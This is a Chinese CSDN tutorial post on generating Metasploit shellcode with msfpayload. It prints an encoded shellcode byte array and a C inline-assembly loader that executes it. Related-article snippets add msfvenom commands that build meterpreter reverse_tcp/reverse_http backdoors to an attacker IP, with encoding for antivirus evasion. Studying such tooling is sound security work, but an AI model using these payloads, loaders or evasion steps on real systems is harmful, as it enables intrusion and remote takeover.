使用msfpayload生成shellcode

最新推荐文章于 2024-08-24 10:12:47 发布
最新推荐文章于 2024-08-24 10:12:47 发布
阅读量5.4k 收藏 1
点赞数 1
分类专栏: 漏洞挖掘 文章标签: 逆向 安全 软件 技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SilverMagic/article/details/40979391
版权

先查看下帮助


使用-l参数配合grep查看可以用的payloads

查询payload的必填参数信息(msfpayload payload_name o)

用键值对的方式传递参数值,并选择shellcode的导出格式(可以仔细看下-h的帮助提示信息)

我们发现这个shellcode里面存在很多\x00这个在字符串拷贝的时候会被截断,所以我们需要通过编码的方式去掉这些\x00


然后测试下shellcode是否能正常使用,测试代码如下

#include <stdio.h>

unsigned char buf[] = 
"\xe8\xff\xff\xff\xff\xc0\x59\x6a\x05\x5e\x29\xf1\x81\xe9\xad"
"\xff\xff\xff\x89\xc8\x2d\xfe\xff\xff\xff\xbf\xcc\xb5\xb7\x27"
"\x81\xc7\xd1\x49\x48\xd8\xf7\xd7\xff\x30\x5b\xc1\xe3\x10\xc1"
"\xeb\x10\x8d\x40\x02\x0f\xb7\x11\x89\xd6\x09\xde\x21\xda\xf7"
"\xd2\x21\xf2\x66\x52\x66\x8f\x01\x81\xe9\xfe\xff\xff\xff\x4f"
"\x85\xff\x0f\x85\xd3\xff\xff\xff\xe2\xa9\x1e\x41\x97\x41\x97"
"\x41\xf7\xc8\x12\xf9\xc0\x9d\x4b\xcf\x7b\x44\x29\x48\xa2\x1a"
"\xb6\x91\xc4\xb9\xcb\x0e\x81\x28\xb0\xd7\x81\x17\x2d\x2b\x4c"
"\x57\x4e\x7b\x6e\xba\xa1\xb7\xa0\x70\x42\x80\x10\xd7\x9b\x85"
"\x8b\x0e\xc9\x32\xc8\xe2\x43\xa2\x3b\x27\xfb\x53\xb1\x52\x61"
"\x02\xea\x4a\xf2\xc1\xaa\xe1\xab\x32\x48\x0e\x01\x85\x35\x0e"
"\x34\xd8\x05\x27\x34\xe7\x98\x26\x57\x2b\x56\xec\x6e\x0c\x1b"
"\xf8\x18\x85\xe0\xbe\x9d\x9a\xe8\x78\xb0\xf3\xe8\xd7\xe9\x04"
"\x8f\x8f\x83\xc4\x08\x9c\x14\x9d\xc7\x16\xc3\x9d\xc2\x4d\x4b"
"\x09\x6f\x2d\x34\x76\x55\x2f\x0f\x7e\xf0\x9e\xa8\xc1\xf2\x4a"
"\xe0\xa1\x66\xfc\x0c\xfd\x81\x78\x38\x78\x38\x78\x68\x10\x59"
"\x9b\x36\x1c\xc9\xc9\x72\x37\x7c\x05\x96\x6d\x30\xf8\x8d\x65"
"\x72\xb0\x4e\xb6\x32\xbc\xb2\x47\x52\x32\x57\x89\x10\x9a\x62"
"\xf5\x08\xf5\x5b\x0a\x8e\x69\xef\x05\x8c\x05";

void main()
{
	__asm
	{
		lea eax,buf
		push eax
		ret
	}
}

银翼魔术师
关注
专栏目录
Kali的学习笔记篇(八)使用msf生成shellcode制作免杀payload
Kind&红衣的博客
08-13 6587
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
使用MSF生成shellcode打造免杀payload
热门推荐
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
使用MSF生成shellcode
weixin_34092455的博客
04-02 1058
使用MSF生成shellcode payloadshellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 966
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
探索MSFvenom Payload Creator (MSFPC):自动化生成Meterpreter Payload的利器
最新发布
gitblog_00520的博客
08-24 655
探索MSFvenom Payload Creator (MSFPC):自动化生成Meterpreter Payload的利器 msfpcMSFvenom Payload Creator (MSFPC)项目地址:https://gitcode.com/gh_mirrors/ms/msfpc 在网络安全的世界里,快速且有效地生成定制的Payload是渗透测试中不可或缺的一环。今天,我们将深入了解一个...
msfvenom 生成shellcode
nethm的专栏
09-20 7766
先来看下msfvenomd的帮助 root@localhost:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] O
使用MSF打造各种ShellCode
weixin_30824599的博客
03-20 2225
MSF 生成各种后门 Windows: 生成Windows后门. msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux...
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 3887
msf shellcode
msf生成linux shellcode,MSF-Shellcode生成使用
weixin_33344952的博客
05-13 584
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具
05-09
面纱军械 Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,而该工具不会改变我们的输出。 我们决定不依赖第三方来执行此操作,而是决定自己编写。 此工具中的所有有效负载均从Metasploit框架移植。 没有声称是任何有效载荷的原始作者。 在Metasploit项目上工作的出色人士都因在此工具中编写不同的有效负载而受到所有人的称赞。 他们的有效负载只是从Ruby移植到Python。 用法: ./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149-端口8675 例子: ./Veil-Ordnance.py -p rev_ht
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 851
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器
探测???
12-07 383
Shellcode是一段用于利用软件漏洞而执行的代码,通常以16进制机器码形式编写,因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行,从而实现对系统的控制或数据的修改、窃取或上传等目的。Shellcode的内容通常是一段可以在受害者的计算机上执行的机器代码,用于实现攻击者的目标。这段代码可以是出于恶作剧目的弹出一个消息框,也可以出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行,甚至是出于破坏目的格式化硬盘等。
msf生成shellcode
weixin_30716141的博客
01-03 518
msfpayload windows/exec CMD = calc.exe EXITFUNC=threadC 在kali Linux2.0新版中msfpayload命令已删除,功能已集成到msfvenom中 msfvenom -pwindows/exec CMD = calc.exeEXITFUNC=thread -f c 转载于:https://www.cnblogs.com/n...
PoC、Exp、PayloadShellcode 浅谈
CTF的博客
05-30 440
渗透中 POC、Exp、PayloadShellcode 浅谈 POC(Proof of Concept,概念验证) 一段 证明漏洞 存在的代码 Exp(Exploit,利用) 一段 漏洞利用的代码,利用系统漏洞进行攻击的动作 Payload(有效载荷) 成功 Exp 之后,真正在目标系统执行的代码或指令 Shellcodeshell 代码) Payload 的一种,利用软件漏洞执行的代码,让攻击者获得shell 注意 PoC 是用来证明漏洞存在的,Exp 是用来利用存在的漏洞,两
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 1941
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
ShellcodePayload入门102-代码中的加密-一如既往地源码和超详细注释
qq327332的博客
11-16 1000
附 1: 测试碰撞率带接口源码在之前的Shellcode代码中, 对于必要的一些字符串常量采用的方法是: 将字符串以16进制形式保存在代码中。而大多数常用的调试工具能够对其进行转译,明眼人一看,诶,这有猫腻啊。 很容易导致我们的“计划”流产。 那顺水推舟的,就接着分享一下鄙人的字符串加密的算法以及需要留意之处。在Shellcode内加密字符串除了增加保密性以外,很重要的一点是能够缩小体积,
网络安全 payloadshellcode、exp、poc
qq_45906009的博客
06-18 5760
在学习网络安全时,我们总会遇见几个名词:payload ,poc,exp,shellcode,有些小伙伴可能会分不清,这些有什么区别,那么下面我就来讲讲。 什么是PoC(Proof of Concept概念证明) Poc是用来证明漏洞存在的。简单来说用来证明一段漏洞的代码,他是无害的。 EXP EXP全称(exploit)即利用,是指利用系统漏洞进行攻击的动作,例如我前面那篇对于MS17010的漏洞利用中,我真正的运行是exploit进行运行的,当然也可以用run。 Payloda payload
渗透中 PoC、Exp、PayloadShellcode 的区别
qq_62292176的博客
04-29 758
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。 2. 几点注意 POC是用来证明漏洞存在的,EXP是用来...
msf可以生成哪几种格式的shellcode?有python的吗?
04-29
Metasploit Framework (MSF) 可以生成多种格式的 shellcode,包括: - Windows Executable (EXE) - Windows PowerShell Script (PS1) - Linux Executable (ELF) - Linux Shell Script (SH) - Mac OS X Executable ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值